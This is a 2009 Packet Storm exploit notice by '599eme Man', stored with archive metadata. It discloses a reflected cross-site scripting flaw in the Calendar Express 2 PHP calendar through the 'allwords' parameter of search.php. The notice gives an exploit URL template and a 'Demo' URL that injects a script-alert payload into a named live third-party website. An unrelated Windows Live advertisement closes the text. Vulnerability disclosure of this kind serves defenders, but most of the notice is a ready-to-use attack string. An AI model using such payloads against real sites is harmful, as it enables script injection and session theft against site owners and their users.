ID PACKETSTORM:79023
Type packetstorm
Reporter 599eme Man
Modified 2009-07-08T00:00:00
Description
`
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________
# [+] Calendar Express 2 Remote Remote XSS vulnerability
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker & Security-shell...
# [+] Dowload : http://script.wareseeker.com/PHP/calendar-express-2.zip/11517
#
#[------------------------------------------------------------------------------------]
#
#
# [+] Exploit :
#
# http://www.site.com/calendar/search.php?allwords=[XSS]&cid=0&title=1&desc=1
#
#[------------------------------------------------------------------------------------]
#
#
# [+] Demo :
#
# http://www.heattreatonline.com/calendar/search.php?allwords='"><script>alert('xss')</script>&cid=0&title=1&desc=1
#
#########################################################################################################
_________________________________________________________________
Vous voulez savoir ce que vous pouvez faire avec le nouveau Windows Live ? Lancez-vous !
http://www.microsoft.com/windows/windowslive/default.aspx`
{"id": "PACKETSTORM:79023", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Calendar Express 2 Cross Site Scripting", "description": "", "published": "2009-07-08T00:00:00", "modified": "2009-07-08T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/79023/Calendar-Express-2-Cross-Site-Scripting.html", "reporter": "599eme Man", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:23:40", "viewCount": 3, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-11-03T10:23:40", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:23:40", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/79023/calendarexpress-xss.txt", "sourceData": "` \n_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_ \n_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_ \n_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_ \n_____0______0______0__0______0___0__0________0___0__00000__0___0_ \n_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_ \n_________________________________________________________________ \n \n \n \n# [+] Calendar Express 2 Remote Remote XSS vulnerability \n# [+] Author : 599eme Man \n# [+] Contact : Flouf@live.fr \n# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker & Security-shell... \n# [+] Dowload : http://script.wareseeker.com/PHP/calendar-express-2.zip/11517 \n# \n#[------------------------------------------------------------------------------------] \n# \n# \n# [+] Exploit : \n# \n# http://www.site.com/calendar/search.php?allwords=[XSS]&cid=0&title=1&desc=1 \n# \n#[------------------------------------------------------------------------------------] \n# \n# \n# [+] Demo : \n# \n# http://www.heattreatonline.com/calendar/search.php?allwords='\"><script>alert('xss')</script>&cid=0&title=1&desc=1 \n# \n######################################################################################################### \n \n \n \n \n_________________________________________________________________ \nVous voulez savoir ce que vous pouvez faire avec le nouveau Windows Live ? Lancez-vous ! \nhttp://www.microsoft.com/windows/windowslive/default.aspx`\n", "immutableFields": []}
{}